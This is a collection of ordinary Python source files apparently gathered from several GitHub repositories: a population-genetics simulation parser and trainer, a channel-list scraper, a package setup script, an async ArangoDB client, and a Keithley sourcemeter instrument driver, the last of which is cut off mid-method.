for i in range(len(samples)):
hapArrayIn[j].append(samples[i][j])
else:
hapArrayIn = samples
return hapArrayIn, positions
def msOutToHaplotypeArrayIn(msOutputFileName, totalPhysLen, discretizePositions=True):
if msOutputFileName == "stdin":
isFile = False
msStream = sys.stdin
else:
isFile = True
if msOutputFileName.endswith(".gz"):
msStream = gzip.open(msOutputFileName, 'rt')
else:
msStream = open(msOutputFileName, 'rt')
header = msStream.readline()
program, numSamples, numSims = header.strip().split()[:3]
numSamples, numSims = int(numSamples), int(numSims)
hapArraysIn = []
positionArrays = []
# advance to first simulation
line = msStream.readline()
while line.strip() != "//":
line = msStream.readline()
while line:
if line.strip() != "//":
sys.exit(
"Malformed ms-style output file: read '%s' instead of '//'. \n" % (line.strip())) # NOQA
segsitesBlah, segsites = msStream.readline().strip().split()
segsites = int(segsites)
if segsitesBlah != "segsites:":
sys.exit("Malformed ms-style output file. \n")
if segsites == 0:
positions = []
hapArrayIn = []
for i in range(numSamples):
hapArrayIn.append([])
else:
positionsLine = msStream.readline().strip().split()
if not positionsLine[0] == "positions:":
sys.exit("Malformed ms-style output file. \n")
positions = [float(x) for x in positionsLine[1:]]
samples = []
for i in range(numSamples):
sampleLine = msStream.readline().strip()
if len(sampleLine) != segsites:
sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples \n" % # NOQA
(segsites, len(sampleLine), sampleLine, i, numSamples)) # NOQA
samples.append(sampleLine)
if len(samples) != numSamples:
raise Exception
hapArrayIn, positions = msRepToHaplotypeArrayIn(
samples, positions, totalPhysLen, True,
discretizePositions=discretizePositions)
hapArraysIn.append(hapArrayIn)
positionArrays.append(positions)
line = msStream.readline()
# advance to the next non-empty line or EOF
while line and line.strip() == "":
line = msStream.readline()
# sys.stderr.write("finished rep %d\n" %(len(hapArraysIn)))
if len(hapArraysIn) != numSims:
sys.exit("Malformed ms-style output file: %s of %s sims processed. \n" % # NOQA
(len(hapArraysIn), numSims))
if isFile:
msStream.close()
return hapArraysIn, positionArrays
def openMsOutFileForSequentialReading(msOutputFileName):
if msOutputFileName == "stdin":
isFile = False
msStream = sys.stdin
else:
isFile = True
if msOutputFileName.endswith(".gz"):
msStream = gzip.open(msOutputFileName, 'rt')
else:
msStream = open(msOutputFileName)
header = msStream.readline()
program, numSamples, numSims = header.strip().split()[:3]
numSamples, numSims = int(numSamples), int(numSims)
return (msStream, isFile), numSamples, numSims
def closeMsOutFile(fileInfoTuple):
msStream, isFile = fileInfoTuple
if isFile:
msStream.close()
def readNextMsRepToHaplotypeArrayIn(fileInfoTuple, numSamples, totalPhysLen, transposeHaps=True, discretizePositions=True):
msStream, isFile = fileInfoTuple
# advance to next simulation
line = msStream.readline()
while not line.strip().startswith("//"):
line = msStream.readline()
segsitesBlah, segsites = msStream.readline().strip().split()
segsites = int(segsites)
if segsitesBlah != "segsites:":
sys.exit("Malformed ms-style output file. \n")
if segsites == 0:
positions = []
hapArrayIn = []
for i in range(numSamples):
hapArrayIn.append([])
else:
positionsLine = msStream.readline().strip().split()
if not positionsLine[0] == "positions:":
sys.exit("Malformed ms-style output file. \n")
positions = [float(x) for x in positionsLine[1:]]
samples = []
for i in range(numSamples):
sampleLine = msStream.readline().strip()
if len(sampleLine) != segsites:
sys.exit("Malformed ms-style output file %s segsites but %s columns in line: %s; line %s of %s samples \n" % # NOQA
(segsites, len(sampleLine), sampleLine, i, numSamples)) # NOQA
samples.append(sampleLine)
if len(samples) != numSamples:
raise Exception
hapArrayIn, positions = msRepToHaplotypeArrayIn(
samples, positions, totalPhysLen, transposeHaps,
discretizePositions=discretizePositions)
return hapArrayIn, positions
def readNextMsRepToGameteStrs(fileInfoTuple, numSamples, totalPhysLen, discretizePositions=True):
return readNextMsRepToHaplotypeArrayIn(fileInfoTuple, numSamples, totalPhysLen, transposeHaps=False, discretizePositions=discretizePositions)
``` |
{
"source": "jradrion/i-against-i",
"score": 2
} |
#### File: i-against-i/iai/trainer.py
```python
from iai.imports import *
from iai.sequenceBatchGenerator import *
from iai.helpers import *
from iai.simulator import *
from iai.networks import *
def runModels_adaptive(ModelFuncPointer,
ModelName,
TrainDir,
ValiDir,
TestDir,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
TrainParams=None,
ValiParams=None,
TestParams=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
initModel=None,
initWeights=None,
network=None,
nCPU = 1,
gpuID = 0,
rep=None,
admixture=None,
testGrid=0,
gridParams=None):
if gridParams:
gridPars = gridParams.split(",")
else:
gridPars = []
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
if(resultsFile == None):
resultsFilename = os.path.basename(trainFile)[:-4] + ".p"
resultsFile = os.path.join("./results/",resultsFilename)
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace(".p","_adapt_1.p")
weightsSave = network[1].replace(".h5","_adapt_1.h5")
modelSave = network[0]
# If TestGenerator is called after model.fit the random shuffling is not the same, even with same seed
print("\nReading test set...")
x_test,y_test = TestGenerator.__getitem__(0)
ct = 1
last_acc = 0.0
acc_diff = 1.0
while acc_diff >= 0.001:
print("Adaptive training iteration %s..."%(ct))
if ct > 1:
## Resimulate using same params as those if tail of accuracy dist
## Identify test examples with lowest accuracy
#resim_ids = []
#deviation = []
#accuracy = []
#for i in range(y_test.shape[0]):
# if y_test[i][0] == 1.0:
# D = 1.0 - y_pred[i][0]
# deviation.append([D,i])
# accuracy.append(1.0-D)
# else:
# D = 1.0 - y_pred[i][1]
# deviation.append([D,i])
# accuracy.append(1.0-D)
#deviation = sorted(deviation)[math.ceil(y_test.shape[0]/10.0)*-1:]
#for d in deviation:
# resim_ids.append(d[1])
#resim_ids = np.array(resim_ids)
#mask = np.zeros(y_test.shape[0], dtype=bool)
#mask[resim_ids] = True
## Create directories for new training sims
#newTrainDir = TrainParams["treesDirectory"] + "_adapt"
#newValiDir = ValiParams["treesDirectory"] + "_adapt"
#for d in [newTrainDir, newValiDir]:
# if os.path.exists(d):
# shutil.rmtree(d)
# os.mkdir(d)
## Resimulate using new parameters
#dg_params = pickle.load(open(os.path.join(NetworkDir, "simPars.p"), "rb"))
#test_params = pickle.load(open(os.path.join(TestDir, "info.p"), "rb"))
#dg_train = Simulator(**dg_params)
#dg_vali = Simulator(**dg_params)
#dg_train.simulateAndProduceTrees(numReps=np.sum(mask)*100,direc=newTrainDir,simulator="msprime",nProc=nCPU,test_params=test_params,mask=mask)
#dg_vali.simulateAndProduceTrees(numReps=np.sum(mask)*5,direc=newValiDir,simulator="msprime",nProc=nCPU,test_params=test_params,mask=mask)
## Redefine the batch generators
#TrainGenerator = SequenceBatchGenerator(**TrainParams)
#ValidationGenerator = SequenceBatchGenerator(**ValiParams)
## Prep for loading weights from previous training iteration
#resultsFile = resultsFile.replace("_adapt_%s.p"%(ct-1),"_adapt_%s.p" %(ct))
#initModel = modelSave
#initWeights = weightsSave
#weightsSave = weightsSave.replace("_adapt_%s.h5"%(ct-1),"_adapt_%s.h5"%(ct))
## Resimulate, with sampling density of parameters is inversly proportional to test accuracy
train_params = pickle.load(open(os.path.join(TrainDir, "info.p"), "rb"))
vali_params = pickle.load(open(os.path.join(ValiDir, "info.p"), "rb"))
test_params = pickle.load(open(os.path.join(TestDir, "info.p"), "rb"))
x_unique = np.unique(test_params[gridPars[0]])
y_unique = np.unique(test_params[gridPars[1]])
X, Y = np.meshgrid(x_unique, y_unique)
# Identify test examples with lowest accuracy
# there has to be a better way to do this using np.where
binary_acc = []
print("Accuracy calculation...")
for i in range(y_test.shape[0]):
progress_bar((i+1)/y_test.shape[0])
if y_test[i][0] == 1.0:
if y_pred[i][0] >= 0.5:
binary_acc.append(1)
else:
binary_acc.append(0)
else:
if y_pred[i][1] >= 0.5:
binary_acc.append(1)
else:
binary_acc.append(0)
binary_acc = np.array(binary_acc)
print("\n")
nTrain = int(train_params["numReps"] * 1.0) # what is the size on the new training set relative to the original generated by iai-simulate
nVali = int(vali_params["numReps"] * 1.0)
nTest = int(test_params["numReps"]/(testGrid**2))
z = binary_acc
z = np.reshape(z, (x_unique.shape[0],
y_unique.shape[0],
int(np.divide(z.shape[0],
x_unique.shape[0] * y_unique.shape[0]))))
#print(np.sum(z,axis=2)+1)
z = np.divide(1,np.sum(z,axis=2)+1) # add 1 (so as to avoid divide by zero) and take inverse
#print(z)
c = 1 # increasing the constant, c, makes the weighting more extreme
z_norm = z**c / np.sum(z**c) # normalize
#print(z_norm)
#z_norm = z / np.linalg.norm(z) #Frobenius 2-norm
#z_norm /= z_norm.shape[0]
zTrain = np.rint(z_norm * nTrain)
zVali = np.rint(z_norm * nVali)
#print(zTrain)
#print(np.sum(zTrain))
#sys.exit()
# Create directories for new training sims
newTrainDir = TrainParams["treesDirectory"] + "_adapt"
newValiDir = ValiParams["treesDirectory"] + "_adapt"
newTestDir = TestParams["treesDirectory"] + "_adapt"
for d in [newTrainDir, newValiDir, newTestDir]:
if os.path.exists(d):
shutil.rmtree(d)
os.mkdir(d)
# Use new parameters
dg_params = pickle.load(open(os.path.join(NetworkDir, "simPars.p"), "rb"))
dg_params["seed"] = ct
dg_train = Simulator(**dg_params)
dg_vali = Simulator(**dg_params)
# set testGrid for the new test set
dg_params["testGrid"] = testGrid
dg_params["gridParams"] = gridParams
dg_test = Simulator(**dg_params)
# Simulate
print("Simulate train set:")
dg_train.simulateAndProduceTrees(numReps=int(np.sum(zTrain)),direc=newTrainDir,simulator="msprime",nProc=nCPU,X=X,Y=Y,Z=zTrain,gridPars=gridPars)
print("Simulate vali set:")
dg_vali.simulateAndProduceTrees(numReps=int(np.sum(zVali)),direc=newValiDir,simulator="msprime",nProc=nCPU,X=X,Y=Y,Z=zVali,gridPars=gridPars)
print("Simulate test set:")
dg_test.simulateAndProduceTrees(numReps=nTest,direc=newTestDir,simulator="msprime",nProc=nCPU)
## trim
maxSegSites = float("inf")
for nDir in [newTrainDir,newValiDir]:
S_min = min(pickle.load(open(os.path.join(nDir,"info.p"),"rb"))["segSites"])
maxSegSites = min(maxSegSites, S_min)
for nDir in [newTrainDir,newValiDir,newTestDir]:
print("\nTrimming genotype and position .npy files in %s to %s SNPs"%(nDir,maxSegSites))
numReps = pickle.load(open(os.path.join(nDir,"info.p"),"rb"))["numReps"]
for i in range(numReps):
Hfilepath = os.path.join(nDir, str(i) + "_haps.npy")
Pfilepath = os.path.join(nDir, str(i) + "_pos.npy")
H = np.load(Hfilepath)
P = np.load(Pfilepath)
H = H[:maxSegSites]
P = P[:maxSegSites]
np.save(Hfilepath,H)
np.save(Pfilepath,P)
progress_bar((i+1)/float(numReps))
# Redefine the batch generators
TrainGenerator = SequenceBatchGenerator(**TrainParams)
ValiParams['batchSize'] = 64
ValidationGenerator = SequenceBatchGenerator(**ValiParams)
TestParams['batchSize'] = nTest*(testGrid**2)
TestParams['shuffleExamples'] = False
TestGenerator = SequenceBatchGenerator(**TestParams)
# Prep for loading weights from previous training iteration
resultsFile = resultsFile.replace("_adapt_%s.p"%(ct-1),"_adapt_%s.p" %(ct))
initModel = modelSave
initWeights = weightsSave
weightsSave = weightsSave.replace("_adapt_%s.h5"%(ct-1),"_adapt_%s.h5"%(ct))
# Regenerate new test set
x_test,y_test = TestGenerator.__getitem__(0)
# Call the training generator
x,y = TrainGenerator.__getitem__(0)
## define model
model = ModelFuncPointer(x,y)
# Early stopping and saving the best weights
if ct > 1:
patience = 50
else:
patience = 50
callbacks_list = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=patience),
ModelCheckpoint(
filepath=weightsSave,
monitor='val_loss',
save_best_only=True)
]
if initWeights:
print("Loading model/weights from path!")
assert initModel != None
jsonFILE = open(initModel,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(initWeights)
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
### include conditional for testing
#if ct > 1: ## include conditional for testing
history = model.fit(TrainGenerator,
steps_per_epoch=epochSteps,
epochs=numEpochs,
validation_data=ValidationGenerator,
use_multiprocessing=False,
callbacks=callbacks_list,
verbose=2)
# Write the network
if(network != None):
##serialize model to JSON
model_json = model.to_json()
with open(modelSave, "w") as json_file:
json_file.write(model_json)
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(weightsSave)
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc = tf.metrics.CategoricalAccuracy()
# Predict on clean test examples
print("Predicting...")
y_pred = model.predict(x_test)
test_acc(y_test, y_pred)
new_acc = float(test_acc.result())
print('\nAdaptive iteration %s: test acc: %s' %(ct, new_acc))
print("Results written to: ",resultsFile)
history.history['loss'] = np.array(history.history['loss'])
history.history['val_loss'] = np.array(history.history['val_loss'])
history.history['predictions'] = np.array(y_pred)
history.history['Y_test'] = np.array(y_test)
history.history['name'] = ModelName
pickle.dump(history.history, open(resultsFile, "wb" ))
# Evaluate improvement in accuracy
acc_diff = new_acc - last_acc
last_acc = new_acc
if ct > 1:
print("\nAccuracy improvement relative to last iteration:",acc_diff)
# Plot training results
plotResultsSoftmax2Heatmap(resultsFile=resultsFile,saveas=resultsFile.replace(".p",".pdf"),admixture=admixture)
ct+=1
#if ct > 2:
# break
def predict_adaptive(ModelFuncPointer,
ModelName,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
test_info=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
init=None,
network=None,
nCPU = 1,
gpuID = 0,
paramsID = None,
admixture=None):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace(".p","_adapt_1.p")
weightsSave = network[1].replace(".h5","_adapt_1.h5")
modelSave = network[0]
########### Prediction on adaptive iteration 1 #############
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(weightsSave)
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_adapt = tf.metrics.CategoricalAccuracy()
# Read all clean test data into memory
x_test, y_test = TestGenerator.__getitem__(0)
predictions = model.predict(x_test)
#replace predictions and Y_test in results file
history= pickle.load(open(resultsFile, "rb"))
tmp = []
for gr in test_info["gr"]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history["Y_test"] = np.array(tmp)
history['predictions'] = np.array(predictions)
#rewrite result file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ",newResultsFile)
pickle.dump(history, open(newResultsFile, "wb"))
test_acc_clean(y_test, predictions)
# Determine number of adaptive iterations with improved accuracy
nthIter = 0
for f in glob.glob(os.path.join(NetworkDir,"testResults_adapt_*.pdf")):
nthIter+=1
nthIter-=1
########### Prediction on final adpative iteration #############
# Redefine modelSave and weightsSave
resultsFile = resultsFile.replace("_adapt_1.p","_adapt_%s.p"%(nthIter))
weightsSave = network[1].replace(".h5","_adapt_%s.h5"%(nthIter))
# Load json and create model
if(network != None):
jsonFILE = open(modelSave,"r")
loadedModel_adapt = jsonFILE.read()
jsonFILE.close()
model_adapt=model_from_json(loadedModel_adapt)
model_adapt.load_weights(weightsSave)
else:
print("Error: model_adapt and weights_adapt not loaded")
sys.exit(1)
predictions_adapt = model_adapt.predict(x_test)
#replace predictions and T_test in results file
history_adapt = pickle.load(open(resultsFile, "rb"))
tmp = []
for gr in test_info["gr"]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_adapt["Y_test"] = np.array(tmp)
history_adapt['predictions'] = np.array(predictions_adapt)
test_acc_adapt(y_test, predictions_adapt)
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_adapt, open(newResultsFile, "wb"))
# Plot results
plotResultsSoftmax2HeatmapMis(resultsFile=newResultsFile.replace("_adapt_%s_params%s.p"%(nthIter,paramsID),"_adapt_1_params%s.p"%(paramsID)),
resultsFile2=newResultsFile,
saveas=newResultsFile.replace(".p",".pdf"),
admixture=admixture)
######### write log ###########
outLog = resultsFile.replace("_adapt_%s.p"%(nthIter),"_log_params%s.txt"%(paramsID))
with open(outLog, "w") as fOUT:
fOUT.write("Before adaptive training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_params2 examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
fOUT.write("\nAfter adaptive training (%s iterations of improvement)\n"%(nthIter-1))
fOUT.write("===========================\n")
fOUT.write('test acc on test_params2 examples (%): {:.3f}\n'.format(test_acc_adapt.result() * 100))
return None
``` |
{
"source": "jradwan/alexa_tivo_control",
"score": 3
} |
#### File: alexa_tivo_control/channelGenerators/generateUKTivoChannels.py
```python
import requests
from bs4 import BeautifulSoup
firstline = True;
def printData(section, genere):
global firstline
for row in section:
if (len(row.find_all("th"))) <1:
# Only process if we dont get headers
channelNumber = row.contents[1].get_text()
channelName = row.contents[3].get_text()
if not firstline:
print(",")
print(" {{ \"name\":\"{}\", \"alias\":\"{}\", \"channel\":{}, \"pronounce\":\"{}\", \"genre\":\"{}\" }}".format(channelName, channelName, channelNumber, channelName, genere),end='')
firstline=False
cont = requests.get('https://www.tvchannellists.com/List_of_channels_on_Virgin_Media_(UK)').content
tvdata = BeautifulSoup(cont, "lxml")
print("[")
printData(tvdata.find(id="Entertainment").parent.next_sibling.next_sibling.find_all('tr'), "Entertainment")
printData(tvdata.find(id="Factual").parent.next_sibling.next_sibling.find_all('tr'), "Factual")
printData(tvdata.find(id="Lifestyle").parent.next_sibling.next_sibling.find_all('tr'), "Lifestyle")
printData(tvdata.find(id="Music").parent.next_sibling.next_sibling.find_all('tr'), "Music")
printData(tvdata.find(id="Movies").parent.next_sibling.next_sibling.find_all('tr'), "Movies")
printData(tvdata.find(id="Sport").parent.next_sibling.next_sibling.find_all('tr'), "Sport")
printData(tvdata.find(id="News").parent.next_sibling.next_sibling.find_all('tr'), "News")
printData(tvdata.find(id="Kids").parent.next_sibling.next_sibling.find_all('tr'), "Kids")
printData(tvdata.find(id="Shopping").parent.next_sibling.next_sibling.find_all('tr'), "Shopping")
printData(tvdata.find(id="International").parent.next_sibling.next_sibling.find_all('tr'), "International")
print("\n]")
``` |
{
"source": "jraedler/DyMat",
"score": 2
} |
#### File: jraedler/DyMat/setup.py
```python
import os
from distutils.core import setup
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "DyMat",
version = "0.7",
author = "<NAME>",
author_email = "<EMAIL>",
description = ("a package for reading and processing the result files of Dymola and OpenModelica"),
license = "BSD",
keywords = "modelica dymola openmodelica mat",
url = "http://www.j-raedler.de/projects/DyMat/",
download_url = "https://github.com/jraedler/DyMat/",
packages = ['DyMat', 'DyMat.Export'],
scripts = ['scripts/DyMatExport.py'],
long_description = read('README.txt'),
classifiers = [
"Development Status :: 4 - Beta",
"Environment :: Console",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python :: 3",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering",
"Topic :: Utilities"
],
)
``` |
{
"source": "JRafiei/pyarango-async",
"score": 3
} |
#### File: pyarango-async/pyarango_async/arango_async.py
```python
import aiohttp
import asyncio
import async_timeout
class ArangoClient(object):
def __init__(self, host='127.0.0.1', port=8529, dbname='', username='root', password=''):
self.max_retry = 1
self.timeout = 3
self.host = host
self.port = port
self.dbname = dbname
self.username = username
self.password = password
self.token = None
self.base_url = f"http://{self.host}:{self.port}"
async def get_token(self, session):
params = {"username": self.username, "password": self.password}
endpoint = f"{self.base_url}/_open/auth"
with async_timeout.timeout(self.timeout):
try:
async with session.post(endpoint, json=params) as response:
res = await response.json()
self.token = res['jwt']
res = await response.json()
except (aiohttp.ClientConnectionError, asyncio.CancelledError) as e:
return None
async def execute(self, query):
async with aiohttp.ClientSession() as session:
params = { "query" : query }
endpoint = f"{self.base_url}/_db/{self.dbname}/_api/cursor"
retry = 0
while retry <= self.max_retry:
headers = {"Authorization": f"bearer {self.token}"}
with async_timeout.timeout(self.timeout):
try:
async with session.post(endpoint, json=params, headers=headers) as response:
res = await response.json()
except (aiohttp.ClientConnectionError, asyncio.CancelledError) as e:
return None
if res['code'] == 401:
if retry == self.max_retry:
return None
else:
await self.get_token(session)
elif res['code'] >= 400:
return None
else:
result = res['result']
return result
retry += 1
``` |
{
"source": "jrafolsr/pyInstruments",
"score": 2
} |
#### File: pyInstruments/instruments/keithley24XX.py
```python
from ..resources import sourcemeter
from numpy import array, linspace
class keithley24XX(sourcemeter):
def __init__(self, resource, termination = '\r'):
sourcemeter.__init__(self,resource, termination = termination)
if (self.identify[0:34] == "KEITHLEY INSTRUMENTS INC.,MODEL 24"):
print('You have connected succesfully with a %s' % self.identify[0:36])
else:
raise Exception('Not able to connect with a 24XX family sourcemeter')
def mode_pulse(self,curr_list,tpulse,term = 'FRONT'):
"""This method implements a pulse generated from the current list from the first argument
with a time length of tpulse"""
n_curr = len(curr_list)
cmdcurr = ":SOUR:LIST:CURR "
for i, curr in enumerate(curr_list):
if i < n_curr -1:
cmdcurr = cmdcurr + "{:.6f},".format(curr)
else:
cmdcurr = cmdcurr + "{:.6f}".format(curr)
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SENS:FUNC:OFF:ALL")
self.inst.write(":SOUR:FUNC:MODE CURR") # Select current source function.
self.inst.write(":SOUR:CURR:MODE LIST") # Set mode list, an strategy to do a pulse
self.inst.write(cmdcurr) # The command to input the list
self.inst.write(":SOUR:DEL %.6e" % (tpulse))
#inst.write(":SOUR:CURR 0.00") # Set source to output 10mA.
self.inst.write(":SOUR:CLE:AUTO ON") # Enable source auto output-off.
#inst.write(":SENS:VOLT:PROT 10") # Set 10V compliance limit.
self.inst.write(":TRIG:COUN {:d}".format(n_curr)) # Set to perform one measurement.
def mode_ifix_configure(self,term = 'FRONT', fw = True, cmpl = 21.0, aver = True,\
Ncount = 10, beeper = True, nplc = 1, sens = True,\
curr_range = None):
"""Configures the 2400 to deliver a fix intensity and measure the voltage drop.
Optional arguments:
- term = 'FRONT': The default terminal is FRONT. REAR can also be passed.
- fw = True: 4-wire measurement or 2-wire
- compl = 10: Set the compliance in volts, default is 10 V.
- aver = True: Enables the average filter. Default is true.
- Ncount = 10: Number of samples to average in case filter is enabled.
- beeper = True: Enables or disables the beeper
- nplc = 1: Light cycles
HAVE FUN! """
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT %i" % beeper) # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SENS:RES:MODE MAN") # Select manual ohms mode.
self.inst.write(":SYST:RSEN %i" % fw) # Select four wire measuremnt ohms mode.
self.inst.write(":SOUR:FUNC CURR") # Select current source function.
self.inst.write(":SOUR:CURR 0.00") # Set source to output 10mA.
self.inst.write(":SOUR:CLE:AUTO OFF") # Enable source auto output-off.
if curr_range is not None:
self.inst.write(":SOUR:CURR:RANG {:.6e}".format(curr_range))
self.inst.write(":SENS:VOLT:PROT %.2f" % cmpl) # Set 10V compliance limit.
self.inst.write(":TRIG:COUN 1") # Set to perform one measurement.
self.inst.write(":SENS:AVER:TCON REP") # Set filter to repeating average
self.inst.write(":SENS:AVER:COUNT %i" % Ncount) # Set filter to repeating to 10 measurements
self.inst.write(":SENS:AVER:STATE %i" % aver) # Enable fiLter
self.inst.write(':SENS:FUNC "VOLT"') # Select ohms measurement function.
# self.inst.write(':SENS:FUNC:ON "VOLT","CURR"')
self.inst.write(":SENS:VOLT:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENS:VOLT:RANG:AUTO ON") # Auto range ON
self.inst.write(":SYST:AZER:STAT ON") # Auto-zero on
# self.inst.write(":SYST:AZER:CACH:STAT ON")
if not sens:
print('All sens function have been turned off')
self.inst.write("SENS:FUNC:OFF:ALL")
def mode_ifix_setcurr(self,curr, curr_max = 0.05, curr_min = -0.05):
""" Sends the order to the sourcemeter to inject the current 'curr' in A.
Option arguments:
- curr_max = 0.1: sets the maximum limit to be injected, to protect the
device.
- curr_min = 0.00: sets the minimum injected current, to polarize a device.
"""
# Set the current value in A
if curr_min < curr < curr_max:
self.inst.write(":SOUR:CURR %.6f" % curr)
elif curr > curr_max:
self.inst.write(":SOUR:CURR %.6f" % curr_max)
print('WARNING: You have reached a software high current limit. Change it with curr_max argument')
else:
self.inst.write(":SOUR:CURR %.6f" % curr_min)
print('WARNING: You have reached a software low current limit. Change it with curr_min argument')
def mode_ifix_read(self):
"""Deprecated"""
print('This method is deprecated, use de read() method instead. Does the same')
return self.inst.query_ascii_values('READ?', container=array)
def read(self):
""" Sends the query read, and returns an array, depending on the type of measurement implemented"""
return self.inst.query_ascii_values('READ?', container=array)
def init(self):
#inst.write(":TRIG:DEL %.6f" % (trigger_del/1000.0))
self.inst.write("INIT")
def mode_vfix_configure(self,term = 'FRONT', fw = False, cmpl = 0.05, beeper = True, aver = True,\
Ncount = 10, nplc = 1, sens = True,\
volt_range = None):
"""Configures the 2400 to deliver a fix voltage and that's it for the moment"
Optional arguments:
- term = 'FRONT': The default terminal is FRONT. REAR can also be passed.
- compl = 10: Set the compliance in volts, default is 10 V.
- beeper = True: Enables or disables the beeper
HAVE FUN! """
self.inst.write("*RST") # Reset instrument to default parameters.
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT %i" % beeper) # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SYST:RSEN %i" % fw) # Select four wire measuremnt ohms mode.
self.inst.write(":SOUR:FUNC VOLT") # Select current source function.
self.inst.write(":SOUR:VOLT 0.00") # Set source to output 0.0V.
self.inst.write(":SOUR:CLE:AUTO OFF") # Enable source auto output-off.
if volt_range is not None:
self.inst.write(":SOUR:VOLT:RANG {:.6e}".format(volt_range))
self.inst.write(":TRIG:COUN 1") # Set to perform one measurement.
self.inst.write(":SENS:AVER:TCON REP") # Set filter to repeating average
self.inst.write(":SENS:AVER:COUNT %i" % Ncount) # Set filter to repeating to 10 measurements
self.inst.write(":SENS:AVER:STATE %i" % aver) # Enable fiLter
self.inst.write(":SENS:VOLT:NPLC %.3f" % nplc) # Set measurement speed to 1 PLC.
self.inst.write(":SENS:VOLT:RANG:AUTO ON") # Auto range ON
self.inst.write(":SENS:CURR:PROT:LEV %.3g" % cmpl) # Set the compliance limit.
if not sens:
print('All sens function have been turned off')
self.inst.write(":SENS:FUNC:OFF:ALL")
def mode_vfix_setvolt(self,volt):
""" Sends the order to the sourcemeter to set the voltage 'volt' in V."""
self.inst.write(":SOUR:VOLT %.6f" % volt)
def outpoff(self):
self.inst.write(":OUTP OFF")
def outpon(self):
self.inst.write(":OUTP ON")
def outpstate(self):
"""Checks the output state"""
return bool(self.inst.query_ascii_values(":OUTPut?")[0])
def close(self):
self.inst.close()
def check_volt_compliance(self):
return bool(self.inst.query_ascii_values(':VOLTage:PROTection:TRIPped?')[0])
def check_curr_compliance(self):
return bool(self.inst.query_ascii_values(':CURRent:PROTection:TRIPped?')[0])
def mode_Vsweep_config(self,start, stop, step = 0.1, mode = 'step', sweep_list = [], term = 'FRONT', cmpl = 0.1, delay = 0.1, ranging = 'AUTO', nplc = 1, spacing = 'LIN'):
"""
Configures the Keithley to perform a voltage sweep
Parameters:
----------
start: int ot float
Initial voltage in V in case of a stair-like sweep.
stop: int ot float
Final voltage in V in case of a stair-like sweep.
step: int ot float
Voltage step in V in case of a stair-like sweep.
mode: 'step' or 'list'
Sweep mode. If 'step' the values start, stop, step and spacing are used to configure the sweep-list values. If 'list' the list passed to the 'sweep_list' argument will be used. The default is 'step'.
term: 'FRONT' ot 'REAR'
The output terminal to use. the defualt is 'FRONT'
cmpl: itn or float
The compliance value in A.
nplc: int or float 0.01 <= nplc <=100
Numebr of pulse lught cycles to average the data. The default is 1.
ranging: 'AUTO' or float
Set the current sensign range to a fix one in the case a value is passed. The default is None and the sourcemeter will adjust the range according to the measured values.
spacing:'LIN' or 'LOG'
Spacinf type of the values in the case of a stair-like sweep.
delay: int or float
Specify delay in seconds between the settled source value and the measurement reading.
"""
print("INFO: Keithley configured in sweep mode")
self.inst.write("*RST") # Reset instrument to default parameters.
# self.inst.write("*CLS")
# self.inst.write("*OPC")
# self.inst.write("*SRE 1")
self.inst.write(":SYSTem:TIME:RESet") # Reset the time of the sourcemeter
self.inst.write(":SYST:BEEP:STAT 1") # Turn on/off the beeper
self.inst.write(":ROUT:TERM %s" % term) # Set the route to term front/rear
self.inst.write(":SOUR:CLE:AUTO ON") # Enable source auto output-off.
self.inst.write(":SOUR:FUNC VOLT")
Npoints = int((stop - start) / step) + 1
if mode == 'step':
self.inst.write(":SOURce:VOLTage:MODE SWEep")
self.inst.write(":SOURce:SwEep:SPACing %s" % spacing)
